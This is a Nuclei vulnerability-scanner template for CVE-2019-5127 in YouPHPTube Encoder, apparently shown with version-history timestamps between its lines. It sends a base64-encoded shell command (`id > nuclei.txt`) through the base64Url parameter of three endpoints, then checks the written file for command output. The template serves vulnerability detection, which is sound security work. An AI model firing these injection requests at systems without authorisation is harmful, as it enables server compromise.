2021-02-10 11:03:39 +00:00
id : CVE-2019-5127
info :
name : YouPHPTube Encoder RCE
author : pikpikcu
severity : critical
2021-09-05 21:13:45 +00:00
description : A command injection vulnerability has been found in YouPHPTube Encoder. A successful attack could allow an attacker to compromise the server. Exploitable unauthenticated command injections exist in YouPHPTube Encoder 2.3, a plugin for providing encoder functionality in YouPHPTube. The parameter base64Url in /objects/getImage.php is vulnerable to a command injection attack.
2021-03-30 12:10:17 +00:00
reference : https://talosintelligence.com/vulnerability_reports/TALOS-2019-0917
2021-02-10 11:03:39 +00:00
tags : cve,cve2019,rce
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.80
cve-id : CVE-2019-5127
cwe-id : CWE-78
2021-02-10 11:03:39 +00:00
requests :
- method : GET
path :
2021-03-11 16:09:36 +00:00
- "{{BaseURL}}/objects/getImage.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=png" # CVE-2019-5127
- "{{BaseURL}}/objects/getImageMP4.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg" # CVE-2019-5128
- "{{BaseURL}}/objects/getSpiritsFromVideo.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg" # CVE-2019-5129
2021-02-10 11:03:39 +00:00
headers :
Content-Type : application/x-www-form-urlencoded
- method : GET
path :
- "{{BaseURL}}/objects/nuclei.txt"
headers :
Content-Type : application/x-www-form-urlencoded
matchers-condition : and
matchers :
2021-03-04 15:23:55 +00:00
- type : word
words :
- "uid="
- "gid="
- "groups="
2021-02-10 11:03:39 +00:00
condition : and
2021-03-04 15:23:55 +00:00
part : body
- type : word
words :
- text/plain
part : header
2021-02-10 11:03:39 +00:00
- type : status
status :
- 200